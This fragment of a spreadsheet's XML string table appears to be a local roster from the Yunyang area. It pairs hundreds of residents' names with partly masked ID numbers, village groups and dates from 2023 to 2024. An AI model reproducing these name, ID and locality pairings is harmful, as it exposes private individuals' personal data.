  <si>
    <t>1499</t>
  </si>
  <si>
    <t>郭新鲜</t>
  </si>
  <si>
    <t>412921********1703</t>
  </si>
  <si>
    <t>1500</t>
  </si>
  <si>
    <t>王永玲</t>
  </si>
  <si>
    <t>1501</t>
  </si>
  <si>
    <t>李天生</t>
  </si>
  <si>
    <t>1502</t>
  </si>
  <si>
    <t>朱喜瑞</t>
  </si>
  <si>
    <t>411326********1512</t>
  </si>
  <si>
    <t>1503</t>
  </si>
  <si>
    <t>朱照祥</t>
  </si>
  <si>
    <t>411326********6111</t>
  </si>
  <si>
    <t>1504</t>
  </si>
  <si>
    <t>万云奇</t>
  </si>
  <si>
    <t>412921********1764</t>
  </si>
  <si>
    <t>1505</t>
  </si>
  <si>
    <t>刘云三</t>
  </si>
  <si>
    <t>412921********1572</t>
  </si>
  <si>
    <t>1506</t>
  </si>
  <si>
    <t>岳全玲</t>
  </si>
  <si>
    <t>1507</t>
  </si>
  <si>
    <t>王成伟</t>
  </si>
  <si>
    <t>412921********1574</t>
  </si>
  <si>
    <t>1508</t>
  </si>
  <si>
    <t>李辉</t>
  </si>
  <si>
    <t>1509</t>
  </si>
  <si>
    <t>程金华</t>
  </si>
  <si>
    <t>1510</t>
  </si>
  <si>
    <t>张山</t>
  </si>
  <si>
    <t>1511</t>
  </si>
  <si>
    <t>胡桂欣</t>
  </si>
  <si>
    <t>1512</t>
  </si>
  <si>
    <t>汤恒星</t>
  </si>
  <si>
    <t>1513</t>
  </si>
  <si>
    <t>汤博渊</t>
  </si>
  <si>
    <t>411321********0035</t>
  </si>
  <si>
    <t>1514</t>
  </si>
  <si>
    <t>赵超杰</t>
  </si>
  <si>
    <t>411326********6140</t>
  </si>
  <si>
    <t>1515</t>
  </si>
  <si>
    <t>李来波</t>
  </si>
  <si>
    <t>1516</t>
  </si>
  <si>
    <t>王振兰</t>
  </si>
  <si>
    <t>1517</t>
  </si>
  <si>
    <t>赵登峰</t>
  </si>
  <si>
    <t>1518</t>
  </si>
  <si>
    <t>余石琨</t>
  </si>
  <si>
    <t>411321********151X</t>
  </si>
  <si>
    <t>1519</t>
  </si>
  <si>
    <t>余雪萌</t>
  </si>
  <si>
    <t>411321********0220</t>
  </si>
  <si>
    <t>1520</t>
  </si>
  <si>
    <t>郑作民</t>
  </si>
  <si>
    <t>1521</t>
  </si>
  <si>
    <t>田萍</t>
  </si>
  <si>
    <t>1522</t>
  </si>
  <si>
    <t>范春岳</t>
  </si>
  <si>
    <t>1523</t>
  </si>
  <si>
    <t>陈斌</t>
  </si>
  <si>
    <t>411326********1558</t>
  </si>
  <si>
    <t>1524</t>
  </si>
  <si>
    <t>侯新俊</t>
  </si>
  <si>
    <t>1525</t>
  </si>
  <si>
    <t>张献月</t>
  </si>
  <si>
    <t>411321********0308</t>
  </si>
  <si>
    <t>1526</t>
  </si>
  <si>
    <t>张献文</t>
  </si>
  <si>
    <t>411321********0373</t>
  </si>
  <si>
    <t>1527</t>
  </si>
  <si>
    <t>云阳老城一组</t>
  </si>
  <si>
    <t>武自松</t>
  </si>
  <si>
    <t>1528</t>
  </si>
  <si>
    <t>赵国华</t>
  </si>
  <si>
    <t>1529</t>
  </si>
  <si>
    <t>武钊</t>
  </si>
  <si>
    <t>411326********1533</t>
  </si>
  <si>
    <t>1530</t>
  </si>
  <si>
    <t>云阳老城四组</t>
  </si>
  <si>
    <t>张小红</t>
  </si>
  <si>
    <t>1531</t>
  </si>
  <si>
    <t>云阳老城</t>
  </si>
  <si>
    <t>郑双振</t>
  </si>
  <si>
    <t>412921********1557</t>
  </si>
  <si>
    <t>1532</t>
  </si>
  <si>
    <t>张付海</t>
  </si>
  <si>
    <t>1533</t>
  </si>
  <si>
    <t>赵建</t>
  </si>
  <si>
    <t>1534</t>
  </si>
  <si>
    <t>赵起超</t>
  </si>
  <si>
    <t>411321********1512</t>
  </si>
  <si>
    <t>1535</t>
  </si>
  <si>
    <t>杨永卫</t>
  </si>
  <si>
    <t>412921********1612</t>
  </si>
  <si>
    <t>1536</t>
  </si>
  <si>
    <t>杜书霞</t>
  </si>
  <si>
    <t>1537</t>
  </si>
  <si>
    <t>李佳琦</t>
  </si>
  <si>
    <t>1538</t>
  </si>
  <si>
    <t>郭延峰</t>
  </si>
  <si>
    <t>412921********0071</t>
  </si>
  <si>
    <t>1539</t>
  </si>
  <si>
    <t>吴念玲</t>
  </si>
  <si>
    <t>1540</t>
  </si>
  <si>
    <t>张应亮</t>
  </si>
  <si>
    <t>412921********1550</t>
  </si>
  <si>
    <t>1541</t>
  </si>
  <si>
    <t>孙炳辉</t>
  </si>
  <si>
    <t>412921********1615</t>
  </si>
  <si>
    <t>1542</t>
  </si>
  <si>
    <t>毛玉霞</t>
  </si>
  <si>
    <t>1543</t>
  </si>
  <si>
    <t>马志久</t>
  </si>
  <si>
    <t>411321********5136</t>
  </si>
  <si>
    <t>1544</t>
  </si>
  <si>
    <t>牧宏霖</t>
  </si>
  <si>
    <t>411321********1510</t>
  </si>
  <si>
    <t>1545</t>
  </si>
  <si>
    <t>铁丰仙</t>
  </si>
  <si>
    <t>1546</t>
  </si>
  <si>
    <t>云阳公安分局</t>
  </si>
  <si>
    <t>任玉淑</t>
  </si>
  <si>
    <t>1547</t>
  </si>
  <si>
    <t>白玉宾</t>
  </si>
  <si>
    <t>1548</t>
  </si>
  <si>
    <t>卢建</t>
  </si>
  <si>
    <t>1549</t>
  </si>
  <si>
    <t>仝瑞雪</t>
  </si>
  <si>
    <t>411326********1527</t>
  </si>
  <si>
    <t>1550</t>
  </si>
  <si>
    <t>黄荣歧</t>
  </si>
  <si>
    <t>1551</t>
  </si>
  <si>
    <t>大关居委会</t>
  </si>
  <si>
    <t>杨智杰</t>
  </si>
  <si>
    <t>411321********2477</t>
  </si>
  <si>
    <t>1552</t>
  </si>
  <si>
    <t>李滨红</t>
  </si>
  <si>
    <t>四集中</t>
  </si>
  <si>
    <t>1553</t>
  </si>
  <si>
    <t>张洪旬</t>
  </si>
  <si>
    <t>1554</t>
  </si>
  <si>
    <t>南召店村南头组</t>
  </si>
  <si>
    <t>魏俊超</t>
  </si>
  <si>
    <t>411326********6118</t>
  </si>
  <si>
    <t>1555</t>
  </si>
  <si>
    <t>陈建荣</t>
  </si>
  <si>
    <t>1556</t>
  </si>
  <si>
    <t>南召店居委会</t>
  </si>
  <si>
    <t>孙明勤</t>
  </si>
  <si>
    <t>1557</t>
  </si>
  <si>
    <t>西关居委会</t>
  </si>
  <si>
    <t>王虎</t>
  </si>
  <si>
    <t>412921********1596</t>
  </si>
  <si>
    <t>4113210524</t>
  </si>
  <si>
    <t>2023年7月</t>
  </si>
  <si>
    <t>1558</t>
  </si>
  <si>
    <t>王峰</t>
  </si>
  <si>
    <t>1559</t>
  </si>
  <si>
    <t>李小俊</t>
  </si>
  <si>
    <t>1560</t>
  </si>
  <si>
    <t>孟赓</t>
  </si>
  <si>
    <t>411321********6140</t>
  </si>
  <si>
    <t>1561</t>
  </si>
  <si>
    <t>狮子坟五里铺</t>
  </si>
  <si>
    <t>崔万青</t>
  </si>
  <si>
    <t>4113210508</t>
  </si>
  <si>
    <t>1562</t>
  </si>
  <si>
    <t>狮子坟三里店</t>
  </si>
  <si>
    <t>411326********1522</t>
  </si>
  <si>
    <t>1563</t>
  </si>
  <si>
    <t>李明鲜</t>
  </si>
  <si>
    <t>411326********1518</t>
  </si>
  <si>
    <t>1564</t>
  </si>
  <si>
    <t>狮子坟四里岔组</t>
  </si>
  <si>
    <t>曹东海</t>
  </si>
  <si>
    <t>412921********3639</t>
  </si>
  <si>
    <t>1565</t>
  </si>
  <si>
    <t>杨岗村</t>
  </si>
  <si>
    <t>冯宇</t>
  </si>
  <si>
    <t>411326********6122</t>
  </si>
  <si>
    <t>4113210516</t>
  </si>
  <si>
    <t>1566</t>
  </si>
  <si>
    <t>冯正杨</t>
  </si>
  <si>
    <t>411321********3710</t>
  </si>
  <si>
    <t>1567</t>
  </si>
  <si>
    <t>大园村</t>
  </si>
  <si>
    <t>姚敬一</t>
  </si>
  <si>
    <t>411321********0223</t>
  </si>
  <si>
    <t>4113210511</t>
  </si>
  <si>
    <t>1568</t>
  </si>
  <si>
    <t>王建斌</t>
  </si>
  <si>
    <t>411326********1520</t>
  </si>
  <si>
    <t>1569</t>
  </si>
  <si>
    <t>南召店</t>
  </si>
  <si>
    <t>杨怀玲</t>
  </si>
  <si>
    <t>1570</t>
  </si>
  <si>
    <t>王新明</t>
  </si>
  <si>
    <t>1571</t>
  </si>
  <si>
    <t>贾桂芝</t>
  </si>
  <si>
    <t>1572</t>
  </si>
  <si>
    <t>赵保国</t>
  </si>
  <si>
    <t>412922********0016</t>
  </si>
  <si>
    <t>1573</t>
  </si>
  <si>
    <t>黄依依</t>
  </si>
  <si>
    <t>411321********5308</t>
  </si>
  <si>
    <t>1574</t>
  </si>
  <si>
    <t>吕东红</t>
  </si>
  <si>
    <t>412921********1604</t>
  </si>
  <si>
    <t>1575</t>
  </si>
  <si>
    <t>张春改</t>
  </si>
  <si>
    <t>1576</t>
  </si>
  <si>
    <t>朱燕</t>
  </si>
  <si>
    <t>1577</t>
  </si>
  <si>
    <t>周堂恒</t>
  </si>
  <si>
    <t>411321********1515</t>
  </si>
  <si>
    <t>1578</t>
  </si>
  <si>
    <t>李健</t>
  </si>
  <si>
    <t>411321********2430</t>
  </si>
  <si>
    <t>1579</t>
  </si>
  <si>
    <t>靳瑞美</t>
  </si>
  <si>
    <t>411321********5607</t>
  </si>
  <si>
    <t>1580</t>
  </si>
  <si>
    <t>陈明献</t>
  </si>
  <si>
    <t>1581</t>
  </si>
  <si>
    <t>杨硕</t>
  </si>
  <si>
    <t>411326********6116</t>
  </si>
  <si>
    <t>1582</t>
  </si>
  <si>
    <t>魏生财</t>
  </si>
  <si>
    <t>1583</t>
  </si>
  <si>
    <t>李茹</t>
  </si>
  <si>
    <t>1584</t>
  </si>
  <si>
    <t>吕吉庆</t>
  </si>
  <si>
    <t>411321********6139</t>
  </si>
  <si>
    <t>1585</t>
  </si>
  <si>
    <t>1586</t>
  </si>
  <si>
    <t>王奇</t>
  </si>
  <si>
    <t>1587</t>
  </si>
  <si>
    <t>小关社区</t>
  </si>
  <si>
    <t>蔺茂林</t>
  </si>
  <si>
    <t>1588</t>
  </si>
  <si>
    <t>刘玉红</t>
  </si>
  <si>
    <t>1589</t>
  </si>
  <si>
    <t>张喜东</t>
  </si>
  <si>
    <t>412921********3313</t>
  </si>
  <si>
    <t>1590</t>
  </si>
  <si>
    <t>梁桂荣</t>
  </si>
  <si>
    <t>1591</t>
  </si>
  <si>
    <t>赵延风</t>
  </si>
  <si>
    <t>1592</t>
  </si>
  <si>
    <t>郭峰</t>
  </si>
  <si>
    <t>1593</t>
  </si>
  <si>
    <t>周香兰</t>
  </si>
  <si>
    <t>1594</t>
  </si>
  <si>
    <t>秦钰</t>
  </si>
  <si>
    <t>1595</t>
  </si>
  <si>
    <t>杨兴烨</t>
  </si>
  <si>
    <t>411321********1523</t>
  </si>
  <si>
    <t>1596</t>
  </si>
  <si>
    <t>孙笑丽</t>
  </si>
  <si>
    <t>1597</t>
  </si>
  <si>
    <t>常东峰</t>
  </si>
  <si>
    <t>1598</t>
  </si>
  <si>
    <t>常棪凯</t>
  </si>
  <si>
    <t>411321********6110</t>
  </si>
  <si>
    <t>1599</t>
  </si>
  <si>
    <t>刘晓鹏</t>
  </si>
  <si>
    <t>1600</t>
  </si>
  <si>
    <t>刘炎炎</t>
  </si>
  <si>
    <t>411322********2020</t>
  </si>
  <si>
    <t>1601</t>
  </si>
  <si>
    <t>刘子豪</t>
  </si>
  <si>
    <t>1602</t>
  </si>
  <si>
    <t>徐彦华</t>
  </si>
  <si>
    <t>1603</t>
  </si>
  <si>
    <t>郑有方</t>
  </si>
  <si>
    <t>412921********1560</t>
  </si>
  <si>
    <t>1604</t>
  </si>
  <si>
    <t>梁裕杭</t>
  </si>
  <si>
    <t>411321********1520</t>
  </si>
  <si>
    <t>1605</t>
  </si>
  <si>
    <t>王志录</t>
  </si>
  <si>
    <t>412921********1614</t>
  </si>
  <si>
    <t>1606</t>
  </si>
  <si>
    <t>陈尚</t>
  </si>
  <si>
    <t>1607</t>
  </si>
  <si>
    <t>王延青</t>
  </si>
  <si>
    <t>412921********1639</t>
  </si>
  <si>
    <t>1608</t>
  </si>
  <si>
    <t>刘春晓</t>
  </si>
  <si>
    <t>1609</t>
  </si>
  <si>
    <t>杨书平</t>
  </si>
  <si>
    <t>1610</t>
  </si>
  <si>
    <t>杨书山</t>
  </si>
  <si>
    <t>1611</t>
  </si>
  <si>
    <t>颜伟</t>
  </si>
  <si>
    <t>1612</t>
  </si>
  <si>
    <t>老城社区</t>
  </si>
  <si>
    <t>张国芳</t>
  </si>
  <si>
    <t>1613</t>
  </si>
  <si>
    <t>郭喜梅</t>
  </si>
  <si>
    <t>412921********188X</t>
  </si>
  <si>
    <t>1614</t>
  </si>
  <si>
    <t>任行亭</t>
  </si>
  <si>
    <t>1615</t>
  </si>
  <si>
    <t>郑广兰</t>
  </si>
  <si>
    <t>1616</t>
  </si>
  <si>
    <t>任新果</t>
  </si>
  <si>
    <t>411321********1525</t>
  </si>
  <si>
    <t>1617</t>
  </si>
  <si>
    <t>凌铭楷</t>
  </si>
  <si>
    <t>411321********2038</t>
  </si>
  <si>
    <t>1618</t>
  </si>
  <si>
    <t>赵清</t>
  </si>
  <si>
    <t>411326********6167</t>
  </si>
  <si>
    <t>1619</t>
  </si>
  <si>
    <t>夏林泉</t>
  </si>
  <si>
    <t>411326********1513</t>
  </si>
  <si>
    <t>1620</t>
  </si>
  <si>
    <t>郭庆选</t>
  </si>
  <si>
    <t>412921********1530</t>
  </si>
  <si>
    <t>1621</t>
  </si>
  <si>
    <t>张勤</t>
  </si>
  <si>
    <t>1622</t>
  </si>
  <si>
    <t>李洋</t>
  </si>
  <si>
    <t>1623</t>
  </si>
  <si>
    <t>刘家民</t>
  </si>
  <si>
    <t>412921********3610</t>
  </si>
  <si>
    <t>1624</t>
  </si>
  <si>
    <t>郭钧豪</t>
  </si>
  <si>
    <t>411321********0470</t>
  </si>
  <si>
    <t>1625</t>
  </si>
  <si>
    <t>郭淯嘉</t>
  </si>
  <si>
    <t>411321********5985</t>
  </si>
  <si>
    <t>1626</t>
  </si>
  <si>
    <t>刘自丽</t>
  </si>
  <si>
    <t>1627</t>
  </si>
  <si>
    <t>云钢社区</t>
  </si>
  <si>
    <t>钱学多</t>
  </si>
  <si>
    <t>412922********572X</t>
  </si>
  <si>
    <t>1628</t>
  </si>
  <si>
    <t>季果果</t>
  </si>
  <si>
    <t>411326********6124</t>
  </si>
  <si>
    <t>1629</t>
  </si>
  <si>
    <t>张语熙</t>
  </si>
  <si>
    <t>411321********0146</t>
  </si>
  <si>
    <t>1630</t>
  </si>
  <si>
    <t>412930********2240</t>
  </si>
  <si>
    <t>1631</t>
  </si>
  <si>
    <t>张海彬</t>
  </si>
  <si>
    <t>412921********2415</t>
  </si>
  <si>
    <t>1632</t>
  </si>
  <si>
    <t>安司奥禹</t>
  </si>
  <si>
    <t>411321********5269</t>
  </si>
  <si>
    <t>1633</t>
  </si>
  <si>
    <t>1634</t>
  </si>
  <si>
    <t>任健斌</t>
  </si>
  <si>
    <t>411321********6138</t>
  </si>
  <si>
    <t>1635</t>
  </si>
  <si>
    <t>任健敏</t>
  </si>
  <si>
    <t>411321********6129</t>
  </si>
  <si>
    <t>1636</t>
  </si>
  <si>
    <t>张海翔</t>
  </si>
  <si>
    <t>411326********151X</t>
  </si>
  <si>
    <t>1637</t>
  </si>
  <si>
    <t>仝太策</t>
  </si>
  <si>
    <t>412921********161X</t>
  </si>
  <si>
    <t>1638</t>
  </si>
  <si>
    <t>许付荣</t>
  </si>
  <si>
    <t>1639</t>
  </si>
  <si>
    <t>李梅林</t>
  </si>
  <si>
    <t>1640</t>
  </si>
  <si>
    <t>李文兰</t>
  </si>
  <si>
    <t>1641</t>
  </si>
  <si>
    <t>时玉改</t>
  </si>
  <si>
    <t>410422********1020</t>
  </si>
  <si>
    <t>1642</t>
  </si>
  <si>
    <t>景国芳</t>
  </si>
  <si>
    <t>1643</t>
  </si>
  <si>
    <t>孙卿</t>
  </si>
  <si>
    <t>1644</t>
  </si>
  <si>
    <t>党蕾</t>
  </si>
  <si>
    <t>1645</t>
  </si>
  <si>
    <t>1646</t>
  </si>
  <si>
    <t>李华芝</t>
  </si>
  <si>
    <t>412921********1542</t>
  </si>
  <si>
    <t>1647</t>
  </si>
  <si>
    <t>崔蕊</t>
  </si>
  <si>
    <t>1648</t>
  </si>
  <si>
    <t>高梓洋</t>
  </si>
  <si>
    <t>411321********003X</t>
  </si>
  <si>
    <t>1649</t>
  </si>
  <si>
    <t>冯二平</t>
  </si>
  <si>
    <t>412925********5521</t>
  </si>
  <si>
    <t>1650</t>
  </si>
  <si>
    <t>赵硕</t>
  </si>
  <si>
    <t>1651</t>
  </si>
  <si>
    <t>王天来</t>
  </si>
  <si>
    <t>1652</t>
  </si>
  <si>
    <t>赵秀禄</t>
  </si>
  <si>
    <t>1653</t>
  </si>
  <si>
    <t>张云香</t>
  </si>
  <si>
    <t>1654</t>
  </si>
  <si>
    <t>李斯涵</t>
  </si>
  <si>
    <t>411321********5183</t>
  </si>
  <si>
    <t>1655</t>
  </si>
  <si>
    <t>李萌恩</t>
  </si>
  <si>
    <t>411321********0360</t>
  </si>
  <si>
    <t>1656</t>
  </si>
  <si>
    <t>吴书铃</t>
  </si>
  <si>
    <t>1657</t>
  </si>
  <si>
    <t>郭玉洋</t>
  </si>
  <si>
    <t>411326********6173</t>
  </si>
  <si>
    <t>1658</t>
  </si>
  <si>
    <t>朱洪惠</t>
  </si>
  <si>
    <t>1659</t>
  </si>
  <si>
    <t>郭晓云</t>
  </si>
  <si>
    <t>1660</t>
  </si>
  <si>
    <t>杨正珍</t>
  </si>
  <si>
    <t>412931********7165</t>
  </si>
  <si>
    <t>1661</t>
  </si>
  <si>
    <t>王长存</t>
  </si>
  <si>
    <t>412921********1580</t>
  </si>
  <si>
    <t>1662</t>
  </si>
  <si>
    <t>张舰</t>
  </si>
  <si>
    <t>412925********3250</t>
  </si>
  <si>
    <t>1663</t>
  </si>
  <si>
    <t>张耀文</t>
  </si>
  <si>
    <t>411322********1654</t>
  </si>
  <si>
    <t>1664</t>
  </si>
  <si>
    <t>刘桂芝</t>
  </si>
  <si>
    <t>1665</t>
  </si>
  <si>
    <t>杨秀连</t>
  </si>
  <si>
    <t>412929********6541</t>
  </si>
  <si>
    <t>1666</t>
  </si>
  <si>
    <t>邱秀平</t>
  </si>
  <si>
    <t>412921********1583</t>
  </si>
  <si>
    <t>1667</t>
  </si>
  <si>
    <t>李先菊</t>
  </si>
  <si>
    <t>1668</t>
  </si>
  <si>
    <t>马兴贵</t>
  </si>
  <si>
    <t>412921********0741</t>
  </si>
  <si>
    <t>1669</t>
  </si>
  <si>
    <t>陈学珍</t>
  </si>
  <si>
    <t>1670</t>
  </si>
  <si>
    <t>方桂荣</t>
  </si>
  <si>
    <t>412921********166X</t>
  </si>
  <si>
    <t>1671</t>
  </si>
  <si>
    <t>郭风枝</t>
  </si>
  <si>
    <t>412931********6764</t>
  </si>
  <si>
    <t>1672</t>
  </si>
  <si>
    <t>翟景山</t>
  </si>
  <si>
    <t>1673</t>
  </si>
  <si>
    <t>张云</t>
  </si>
  <si>
    <t>412921********2827</t>
  </si>
  <si>
    <t>1674</t>
  </si>
  <si>
    <t>靳德荣</t>
  </si>
  <si>
    <t>412921********1680</t>
  </si>
  <si>
    <t>1675</t>
  </si>
  <si>
    <t>李书芳</t>
  </si>
  <si>
    <t>1676</t>
  </si>
  <si>
    <t>梁亚东</t>
  </si>
  <si>
    <t>412921********1812</t>
  </si>
  <si>
    <t>1677</t>
  </si>
  <si>
    <t>刘冬</t>
  </si>
  <si>
    <t>1678</t>
  </si>
  <si>
    <t>张明琴</t>
  </si>
  <si>
    <t>1679</t>
  </si>
  <si>
    <t>刘介兰</t>
  </si>
  <si>
    <t>412930********1727</t>
  </si>
  <si>
    <t>1680</t>
  </si>
  <si>
    <t>高举荣</t>
  </si>
  <si>
    <t>412925********5586</t>
  </si>
  <si>
    <t>1681</t>
  </si>
  <si>
    <t>马银栋</t>
  </si>
  <si>
    <t>1682</t>
  </si>
  <si>
    <t>林桂芳</t>
  </si>
  <si>
    <t>1683</t>
  </si>
  <si>
    <t>胡伟</t>
  </si>
  <si>
    <t>412921********1657</t>
  </si>
  <si>
    <t>1684</t>
  </si>
  <si>
    <t>张建伟</t>
  </si>
  <si>
    <t>412921********1553</t>
  </si>
  <si>
    <t>1685</t>
  </si>
  <si>
    <t>徐莉</t>
  </si>
  <si>
    <t>1686</t>
  </si>
  <si>
    <t>胡显荣</t>
  </si>
  <si>
    <t>1687</t>
  </si>
  <si>
    <t>陈明超</t>
  </si>
  <si>
    <t>1688</t>
  </si>
  <si>
    <t>薛天芝</t>
  </si>
  <si>
    <t>1689</t>
  </si>
  <si>
    <t>郑浩</t>
  </si>
  <si>
    <t>1690</t>
  </si>
  <si>
    <t>曹会志</t>
  </si>
  <si>
    <t>1691</t>
  </si>
  <si>
    <t>臧秀连</t>
  </si>
  <si>
    <t>1692</t>
  </si>
  <si>
    <t>郭长克</t>
  </si>
  <si>
    <t>1693</t>
  </si>
  <si>
    <t>郭金沅</t>
  </si>
  <si>
    <t>1694</t>
  </si>
  <si>
    <t>屈玉焕</t>
  </si>
  <si>
    <t>412930********4825</t>
  </si>
  <si>
    <t>1695</t>
  </si>
  <si>
    <t>王一杰</t>
  </si>
  <si>
    <t>1696</t>
  </si>
  <si>
    <t>余宛蓉</t>
  </si>
  <si>
    <t>410381********0121</t>
  </si>
  <si>
    <t>1697</t>
  </si>
  <si>
    <t>袁金瑞</t>
  </si>
  <si>
    <t>1698</t>
  </si>
  <si>
    <t>张瑞</t>
  </si>
  <si>
    <t>1699</t>
  </si>
  <si>
    <t>张旋</t>
  </si>
  <si>
    <t>411321********6122</t>
  </si>
  <si>
    <t>1700</t>
  </si>
  <si>
    <t>张玲</t>
  </si>
  <si>
    <t>1701</t>
  </si>
  <si>
    <t>魏普宁</t>
  </si>
  <si>
    <t>412921********6110</t>
  </si>
  <si>
    <t>1702</t>
  </si>
  <si>
    <t>徐志勤</t>
  </si>
  <si>
    <t>412925********422X</t>
  </si>
  <si>
    <t>1703</t>
  </si>
  <si>
    <t>郑清毅</t>
  </si>
  <si>
    <t>411321********6119</t>
  </si>
  <si>
    <t>1704</t>
  </si>
  <si>
    <t>马保枝</t>
  </si>
  <si>
    <t>1705</t>
  </si>
  <si>
    <t>吴明先</t>
  </si>
  <si>
    <t>1706</t>
  </si>
  <si>
    <t>肖德兰</t>
  </si>
  <si>
    <t>412929********1925</t>
  </si>
  <si>
    <t>1707</t>
  </si>
  <si>
    <t>邱学莲</t>
  </si>
  <si>
    <t>1708</t>
  </si>
  <si>
    <t>代小丽</t>
  </si>
  <si>
    <t>1709</t>
  </si>
  <si>
    <t>李同法</t>
  </si>
  <si>
    <t>1710</t>
  </si>
  <si>
    <t>藏兴华</t>
  </si>
  <si>
    <t>1711</t>
  </si>
  <si>
    <t>郝龙海</t>
  </si>
  <si>
    <t>1712</t>
  </si>
  <si>
    <t>郝嘉亮</t>
  </si>
  <si>
    <t>411321********6137</t>
  </si>
  <si>
    <t>1713</t>
  </si>
  <si>
    <t>罗小丽</t>
  </si>
  <si>
    <t>1714</t>
  </si>
  <si>
    <t>梁士奇</t>
  </si>
  <si>
    <t>412921********1559</t>
  </si>
  <si>
    <t>1715</t>
  </si>
  <si>
    <t>杨雅迪</t>
  </si>
  <si>
    <t>411326********6126</t>
  </si>
  <si>
    <t>1716</t>
  </si>
  <si>
    <t>严银芝</t>
  </si>
  <si>
    <t>412921********1682</t>
  </si>
  <si>
    <t>1717</t>
  </si>
  <si>
    <t>罗爱华</t>
  </si>
  <si>
    <t>620103********2313</t>
  </si>
  <si>
    <t>1718</t>
  </si>
  <si>
    <t>齐运动</t>
  </si>
  <si>
    <t>412921********1594</t>
  </si>
  <si>
    <t>1719</t>
  </si>
  <si>
    <t>赵建华</t>
  </si>
  <si>
    <t>1720</t>
  </si>
  <si>
    <t>程永</t>
  </si>
  <si>
    <t>412921********1592</t>
  </si>
  <si>
    <t>2023年9月</t>
  </si>
  <si>
    <t>1721</t>
  </si>
  <si>
    <t>程心柳</t>
  </si>
  <si>
    <t>411321********6145</t>
  </si>
  <si>
    <t>1722</t>
  </si>
  <si>
    <t>张森</t>
  </si>
  <si>
    <t>411326********1531</t>
  </si>
  <si>
    <t>1723</t>
  </si>
  <si>
    <t>张嘉铭</t>
  </si>
  <si>
    <t>411321********5317</t>
  </si>
  <si>
    <t>1724</t>
  </si>
  <si>
    <t>小关居委会五组</t>
  </si>
  <si>
    <t>孟煜杰</t>
  </si>
  <si>
    <t>1725</t>
  </si>
  <si>
    <t>孟祥贵</t>
  </si>
  <si>
    <t>1726</t>
  </si>
  <si>
    <t>孟凡有</t>
  </si>
  <si>
    <t>1727</t>
  </si>
  <si>
    <t>小关居委会一组</t>
  </si>
  <si>
    <t>马明杰</t>
  </si>
  <si>
    <t>411326********1525</t>
  </si>
  <si>
    <t>1728</t>
  </si>
  <si>
    <t>小关居委会二组</t>
  </si>
  <si>
    <t>李俊志</t>
  </si>
  <si>
    <t>411326********6132</t>
  </si>
  <si>
    <t>1729</t>
  </si>
  <si>
    <t>小关居委会三组</t>
  </si>
  <si>
    <t>董运锋</t>
  </si>
  <si>
    <t>1730</t>
  </si>
  <si>
    <t>李玉辉</t>
  </si>
  <si>
    <t>411326********1515</t>
  </si>
  <si>
    <t>1731</t>
  </si>
  <si>
    <t>吴运荣</t>
  </si>
  <si>
    <t>412921********1640</t>
  </si>
  <si>
    <t>1732</t>
  </si>
  <si>
    <t>刘中乐</t>
  </si>
  <si>
    <t>1733</t>
  </si>
  <si>
    <t>李宏恩</t>
  </si>
  <si>
    <t>411326********1530</t>
  </si>
  <si>
    <t>1734</t>
  </si>
  <si>
    <t>朱坪村下庄组</t>
  </si>
  <si>
    <t>马连发</t>
  </si>
  <si>
    <t>4113210515</t>
  </si>
  <si>
    <t>2023年11月</t>
  </si>
  <si>
    <t>1735</t>
  </si>
  <si>
    <t>王恩环</t>
  </si>
  <si>
    <t>412921********1648</t>
  </si>
  <si>
    <t>1736</t>
  </si>
  <si>
    <t>南召店村袁庄组</t>
  </si>
  <si>
    <t>王文明</t>
  </si>
  <si>
    <t>1737</t>
  </si>
  <si>
    <t>朱应霞</t>
  </si>
  <si>
    <t>1738</t>
  </si>
  <si>
    <t>段成龙</t>
  </si>
  <si>
    <t>411321********6136</t>
  </si>
  <si>
    <t>1739</t>
  </si>
  <si>
    <t>段涵馨</t>
  </si>
  <si>
    <t>411321********0381</t>
  </si>
  <si>
    <t>1740</t>
  </si>
  <si>
    <t>李清</t>
  </si>
  <si>
    <t>1741</t>
  </si>
  <si>
    <t>小关居委会</t>
  </si>
  <si>
    <t>任行迪</t>
  </si>
  <si>
    <t>1742</t>
  </si>
  <si>
    <t>王漫</t>
  </si>
  <si>
    <t>411321********558X</t>
  </si>
  <si>
    <t>1743</t>
  </si>
  <si>
    <t>董万玲</t>
  </si>
  <si>
    <t>2024年1月</t>
  </si>
  <si>
    <t>1744</t>
  </si>
  <si>
    <t>李红金</t>
  </si>
  <si>
    <t>1745</t>
  </si>
  <si>
    <t>王振豪</t>
  </si>
  <si>
    <t>411326********1516</t>
  </si>
  <si>
    <t>1746</t>
  </si>
  <si>
    <t>西关居委会一组</t>
  </si>
  <si>
    <t>杨锋</t>
  </si>
  <si>
    <t>1747</t>
  </si>
  <si>
    <t>大关居委会一组</t>
  </si>
  <si>
    <t>黄德龙</t>
  </si>
  <si>
    <t>1748</t>
  </si>
  <si>
    <t>董洪强</t>
  </si>
  <si>
    <t>2024年4月</t>
  </si>
  <si>
    <t>1749</t>
  </si>
  <si>
    <t>南召店村（医药库)</t>
  </si>
  <si>
    <t>凌润鹏</t>
  </si>
  <si>
    <t>411321********0175</t>
  </si>
  <si>
    <t>1750</t>
  </si>
  <si>
    <t>李永录</t>
  </si>
  <si>
    <t>2024年5月</t>
  </si>
  <si>
    <t>1751</t>
  </si>
  <si>
    <t>山头村余庄组</t>
  </si>
  <si>
    <t>谢书勤</t>
  </si>
  <si>
    <t>4113210512</t>
  </si>
  <si>
    <t>2024年6月</t>
  </si>
  <si>
    <t>1752</t>
  </si>
  <si>
    <t>南召店村</t>
  </si>
  <si>
    <t>张云洋</t>
  </si>
  <si>
    <t>1753</t>
  </si>
  <si>
    <t>袁顺敏</t>
  </si>
  <si>
    <t>2024年8月</t>
  </si>
  <si>
    <t>1754</t>
  </si>
  <si>
    <t>小关居委会四组</t>
  </si>
  <si>
    <t>王全成</t>
  </si>
  <si>
    <t>1755</t>
  </si>
  <si>
    <t>大关居委会五组</t>
  </si>
  <si>
    <t>林清勤</t>
  </si>
  <si>
    <t>1756</t>
  </si>
  <si>
    <t>景相新</t>
  </si>
  <si>
    <t>411326********1514</t>
  </si>
  <si>
    <t>2024年11月</t>
  </si>
  <si>
    <t>1757</t>
  </si>
  <si>
    <t>唐庄村西岭组</t>
  </si>
  <si>
    <t>陈玉勤</t>
  </si>
  <si>
    <t>412921********1688</t>
  </si>
  <si>
    <t>411321050101</t>
  </si>
  <si>
    <t>1758</t>
  </si>
  <si>
    <t>张嘉欣</t>
  </si>
  <si>
    <t>411326********6163</t>
  </si>
  <si>
    <t>1759</t>
  </si>
  <si>
    <t>王春龙</t>
  </si>
  <si>
    <t>1760</t>
  </si>
  <si>
    <t>南召店村（大理石厂）</t>
